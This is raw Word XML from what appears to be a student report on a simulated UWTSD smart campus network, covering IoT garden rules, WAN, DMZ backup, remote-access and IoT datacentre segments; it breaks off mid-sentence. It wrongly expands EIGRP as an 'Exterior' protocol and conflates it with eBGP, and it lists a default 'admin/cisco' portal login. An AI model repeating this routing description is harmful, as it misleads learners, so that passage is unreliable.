                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B8F072" w14:textId="006F5603" w:rsidR="00730E3F" w:rsidRPr="00730E3F" w:rsidRDefault="002F52B1" w:rsidP="002F52B1">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>38</w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>; Garden Plant and Soil IoT Rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFE7E46" w14:textId="4603BBD2" w:rsidR="0068637B" w:rsidRDefault="00FE6E2C" w:rsidP="00D87B36">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00730E3F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Air Humidi</w:t>
      </w:r>
      <w:r w:rsidR="00730E3F" w:rsidRPr="00730E3F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ty Monitor</w:t>
      </w:r>
      <w:r w:rsidR="0068637B">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00730E3F" w:rsidRPr="00730E3F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Garden Sprinklers</w:t>
      </w:r>
      <w:r w:rsidR="0068637B">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> and Water Drain</w:t>
      </w:r>
      <w:r w:rsidR="00730E3F" w:rsidRPr="00730E3F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidR="00EF7352">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EF7352">
        <w:t xml:space="preserve">These IoT smart devices have been programmed at the IoT datacentre registration server so that they are linked by a set of rules. The rules states that if the air humidity is </w:t>
      </w:r>
      <w:r w:rsidR="003500D6">
        <w:t>equal to 20%</w:t>
      </w:r>
      <w:r w:rsidR="00EF7352">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003500D6">
        <w:t xml:space="preserve">then the garden sprinklers would also be activated to </w:t>
      </w:r>
      <w:r w:rsidR="0068637B">
        <w:t>prevent the plants and grass from drying out.</w:t>
      </w:r>
      <w:r w:rsidR="0068637B" w:rsidRPr="0068637B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0068637B">
        <w:t xml:space="preserve">These rules can be found in </w:t>
      </w:r>
      <w:r w:rsidR="0068637B" w:rsidRPr="0021356E">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">figure </w:t>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>39</w:t>
      </w:r>
      <w:r w:rsidR="0068637B" w:rsidRPr="0021356E">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3F2F13" w14:textId="77777777" w:rsidR="008C09E2" w:rsidRDefault="008C09E2" w:rsidP="00D87B36">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62CEB58B" w14:textId="2E01F9EE" w:rsidR="0068637B" w:rsidRDefault="003500D6" w:rsidP="0068637B">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F14EEEF" wp14:editId="476BE89F">
            <wp:extent cx="3200400" cy="2508885"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="2476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200400" cy="2508885"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3339F57A" w14:textId="33338024" w:rsidR="00FE6E2C" w:rsidRDefault="0068637B" w:rsidP="0068637B">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>39</w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>: Air Humidity Monitor Rule</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FFCE805" w14:textId="71046C4E" w:rsidR="00EF7352" w:rsidRDefault="0068637B" w:rsidP="00D87B36">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Solar panels were also implemented within the UWTSD garden to provide environmental clean energy to the university to help reduce the university power costs and also reduce the university’s carbon footprint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D78E23A" w14:textId="518BAF06" w:rsidR="0068637B" w:rsidRDefault="0068637B" w:rsidP="00D87B36">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76C65F01" w14:textId="40096AE7" w:rsidR="0068637B" w:rsidRDefault="0068637B" w:rsidP="00D87B36">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A wind barometer was also installed within the garden to measure the wind to collect data for the meteorological centre because the </w:t>
      </w:r>
      <w:r w:rsidR="00DE76EB">
        <w:t>u</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">niversity is built next to the sea, which is a </w:t>
      </w:r>
      <w:r w:rsidR="00DE76EB">
        <w:t>perfect</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> location to collect meteorological data</w:t>
      </w:r>
      <w:r w:rsidR="00DE76EB">
        <w:t xml:space="preserve"> to aid in weather patterns and weather predictions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C2A0DD" w14:textId="77777777" w:rsidR="00EF7352" w:rsidRPr="00730E3F" w:rsidRDefault="00EF7352" w:rsidP="00D87B36">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="474D442B" w14:textId="278CC39C" w:rsidR="00EA4899" w:rsidRPr="00DF798E" w:rsidRDefault="00EA4899" w:rsidP="008F5C3A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00654B17">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Internet WAN</w:t>
      </w:r>
      <w:r w:rsidR="00DF798E">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Segment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158BE288" w14:textId="77777777" w:rsidR="00DF798E" w:rsidRPr="00DF798E" w:rsidRDefault="00DF798E" w:rsidP="00DF798E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="4"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53C4FBCE" w14:textId="6D847B7E" w:rsidR="00DF798E" w:rsidRDefault="00DF798E" w:rsidP="00DF798E">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00DF798E">
        <w:t xml:space="preserve">This </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Internet WAN </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF798E">
        <w:t>segment was created</w:t>
      </w:r>
      <w:r w:rsidR="008164A2">
        <w:t xml:space="preserve"> utilising a</w:t>
      </w:r>
      <w:r w:rsidR="00BD098B">
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="008164A2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BD098B">
        <w:t>Exterior</w:t>
      </w:r>
      <w:r w:rsidR="008164A2">
        <w:t xml:space="preserve"> Gateway Routing Protocol (EIGRP) external Border Gateway Protocol (eBGP)</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF798E">
        <w:t xml:space="preserve"> within the PT simulation of the UWTSD smart campus </w:t>
      </w:r>
      <w:r>
        <w:t>to simulate packets traversing the Internet from the UWTSD LAN to</w:t>
      </w:r>
      <w:r w:rsidR="008164A2">
        <w:t xml:space="preserve"> various Autonomous Systems (AS) to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> analyse how traffic would behave within a practical deployment of the network topology, to exam efficiency in latency along with cybersecurity counter measures. This segment can be found in figure </w:t>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:t>40</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F35CA2F" w14:textId="256DCDC9" w:rsidR="00DF798E" w:rsidRDefault="00DF798E" w:rsidP="00DF798E">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DA6F1B7" w14:textId="77777777" w:rsidR="008164A2" w:rsidRDefault="008164A2" w:rsidP="008164A2">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02A27138" wp14:editId="514FD7B4">
            <wp:extent cx="3206115" cy="1888490"/>
            <wp:effectExtent l="19050" t="19050" r="13335" b="165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206115" cy="1888490"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="007C4E0C" w14:textId="7EEACEEC" w:rsidR="008164A2" w:rsidRDefault="008164A2" w:rsidP="008164A2">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>40</w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>: Internet WAN Segment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9F1823" w14:textId="77777777" w:rsidR="008164A2" w:rsidRDefault="008164A2" w:rsidP="00DF798E">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04263F18" w14:textId="1331D9BD" w:rsidR="00DF798E" w:rsidRDefault="008164A2" w:rsidP="00DF798E">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>The WAN segment also helped to analyse how the IoT data and remote workers/partner LAN’s VPN traffic would behave with the current configurations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7AE94C" w14:textId="77777777" w:rsidR="008164A2" w:rsidRPr="00DF798E" w:rsidRDefault="008164A2" w:rsidP="00DF798E">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04537B91" w14:textId="0D09D676" w:rsidR="009077BC" w:rsidRPr="00A621AC" w:rsidRDefault="009077BC" w:rsidP="008F5C3A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>UWTSD Offsite Data Backup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D752B35" w14:textId="24B66224" w:rsidR="00A621AC" w:rsidRDefault="00A621AC" w:rsidP="00A621AC">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00A621AC">
        <w:t xml:space="preserve">This LAN segment was implemented so that the data that is stored </w:t>
      </w:r>
      <w:r w:rsidR="00272A6F">
        <w:t xml:space="preserve">at the DMZ extranet server farm </w:t>
      </w:r>
      <w:r w:rsidRPr="00A621AC">
        <w:t xml:space="preserve">can be </w:t>
      </w:r>
      <w:r w:rsidR="00272A6F">
        <w:t>replicated</w:t>
      </w:r>
      <w:r w:rsidRPr="00A621AC">
        <w:t xml:space="preserve"> offsite</w:t>
      </w:r>
      <w:r w:rsidR="00272A6F">
        <w:t xml:space="preserve">, in the event the user data was to become corrupt or lost within the DMZ. The decision to </w:t>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:t>back up</w:t>
      </w:r>
      <w:r w:rsidR="00272A6F">
        <w:t xml:space="preserve"> the DMZ data offsite was taken to prevent potential malware that is may be stored at the DMZ servers by Internet users being replicated internally in the ‘Safe’ zone of the LAN corrupting/and or allowing malicious actors remote access into the internal network. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A621AC">
        <w:t xml:space="preserve">The offsite </w:t>
      </w:r>
      <w:r w:rsidR="00272A6F">
        <w:t xml:space="preserve">DMZ </w:t>
      </w:r>
      <w:r w:rsidRPr="00A621AC">
        <w:t xml:space="preserve">backup LAN segment can be found in figure </w:t>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:t>41</w:t>
      </w:r>
      <w:r w:rsidRPr="00A621AC">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6E6298" w14:textId="77777777" w:rsidR="00272A6F" w:rsidRPr="00272A6F" w:rsidRDefault="00272A6F" w:rsidP="00A621AC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="12"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63893B19" w14:textId="77777777" w:rsidR="00A15B0B" w:rsidRDefault="00272A6F" w:rsidP="00A15B0B">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C234DAC" wp14:editId="6D3096FC">
            <wp:extent cx="3243580" cy="990600"/>
            <wp:effectExtent l="19050" t="19050" r="13970" b="190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49">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect r="-1180" b="-5846"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3243943" cy="990711"/>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06485120" w14:textId="66E90590" w:rsidR="00BE00CE" w:rsidRPr="00A621AC" w:rsidRDefault="00A15B0B" w:rsidP="00A15B0B">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>41</w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>:DMZ Backup Offsite External LAN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74775205" w14:textId="417E769B" w:rsidR="00654B17" w:rsidRDefault="009077BC" w:rsidP="008F5C3A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Remote Workers/</w:t>
      </w:r>
      <w:r w:rsidR="003E14F0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Extranet </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Partners</w:t>
      </w:r>
      <w:r w:rsidR="003E14F0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> LAN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A759AF7" w14:textId="77777777" w:rsidR="003E14F0" w:rsidRPr="003E14F0" w:rsidRDefault="003E14F0" w:rsidP="003E14F0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="4"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F0038B4" w14:textId="2DEA99E3" w:rsidR="00A15B0B" w:rsidRDefault="003E14F0" w:rsidP="00A15B0B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="003E14F0">
        <w:t xml:space="preserve">This remote workers and extranet partners LAN </w:t>
      </w:r>
      <w:r>
        <w:t>was</w:t>
      </w:r>
      <w:r w:rsidRPr="003E14F0">
        <w:t xml:space="preserve"> created to simulate the remote access configuration and VPN security architecture of remote users utilising the UWTSD LAN. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">This external LAN segment can be found in figure </w:t>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:t>42</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F83EE7" w14:textId="2891F0F2" w:rsidR="003E14F0" w:rsidRDefault="003E14F0" w:rsidP="00A15B0B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F31E1D4" w14:textId="77777777" w:rsidR="003E14F0" w:rsidRDefault="003E14F0" w:rsidP="003E14F0">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05DE20E8" wp14:editId="0A34B9C1">
            <wp:extent cx="3200400" cy="2112010"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="215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200400" cy="2112010"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB3A110" w14:textId="7F07D17B" w:rsidR="003E14F0" w:rsidRDefault="003E14F0" w:rsidP="00241BC7">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>42</w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>: Remote LAN Workers/Extranet Partners Simulated LAN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB89D6D" w14:textId="70B9F8EE" w:rsidR="00241BC7" w:rsidRDefault="00241BC7" w:rsidP="00241BC7">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This segment is a generic representation of external access to the UWTSD LAN from remote workers/partners. In a real-world scenario this segment would be made up of various LAN’s traversing various AS through multiple ISP’s. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298FBBB2" w14:textId="77777777" w:rsidR="00241BC7" w:rsidRPr="00241BC7" w:rsidRDefault="00241BC7" w:rsidP="00241BC7">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57E7FF75" w14:textId="28DBE5B2" w:rsidR="009077BC" w:rsidRDefault="009077BC" w:rsidP="008F5C3A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>IoT Cloud Datacentre</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1707B290" w14:textId="77777777" w:rsidR="003F42B8" w:rsidRPr="003F42B8" w:rsidRDefault="003F42B8" w:rsidP="003F42B8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="4"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24AC1621" w14:textId="17013025" w:rsidR="00FE2393" w:rsidRDefault="00021E6E" w:rsidP="00F72838">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The IoT cloud datacentre LAN represents an external IoT company who</w:t>
      </w:r>
      <w:r w:rsidR="003F42B8">
        <w:t>m</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003F42B8">
        <w:t>manufacturer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and store</w:t>
      </w:r>
      <w:r w:rsidR="003F42B8">
        <w:t xml:space="preserve"> the data from </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="003F42B8">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IoT</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> devices </w:t>
      </w:r>
      <w:r w:rsidR="003F42B8">
        <w:t>within their registration/application servers for</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> businesses</w:t>
      </w:r>
      <w:r w:rsidR="003F42B8">
        <w:t xml:space="preserve"> to access for configuration and management of the devices</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00986E3C">
        <w:t xml:space="preserve">The IoT devices that have been implemented within </w:t>
      </w:r>
      <w:r w:rsidR="00986E3C">
        <w:t xml:space="preserve">the UWTSD smart campus LAN interact and send data to and from the registration server </w:t>
      </w:r>
      <w:r w:rsidR="003F42B8">
        <w:t xml:space="preserve">located </w:t>
      </w:r>
      <w:r w:rsidR="00986E3C">
        <w:t xml:space="preserve">within this LAN segment to perform the actions that they are programmed to execute. An illustration of this segment can be found in </w:t>
      </w:r>
      <w:r w:rsidR="00986E3C" w:rsidRPr="00FE2393">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">figure </w:t>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>43</w:t>
      </w:r>
      <w:r w:rsidR="00986E3C" w:rsidRPr="00FE2393">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00FE2393" w:rsidRPr="00FE2393">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E802B62" w14:textId="560D1675" w:rsidR="00FE2393" w:rsidRDefault="00FE2393" w:rsidP="00F72838">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A383839" w14:textId="77777777" w:rsidR="00FE2393" w:rsidRDefault="00FE2393" w:rsidP="00FE2393">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F2CA812" wp14:editId="72702180">
            <wp:extent cx="3238500" cy="2226310"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="215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244842" cy="2230670"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2367C3" w14:textId="57D1F676" w:rsidR="00FE2393" w:rsidRDefault="00FE2393" w:rsidP="00FE2393">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>43</w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>: IoT Cloud Datacentre LAN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9BE24B" w14:textId="55D005EB" w:rsidR="00021E6E" w:rsidRDefault="00FE2393" w:rsidP="00F72838">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The devices can be managed by both the IoT workers for an additional cost and/or accessed via a web browser portal with the address; </w:t>
      </w:r>
      <w:r w:rsidR="00850153">
        <w:t xml:space="preserve">(Username: admin Password: cisco) </w:t>
      </w:r>
      <w:r w:rsidR="003F42B8">
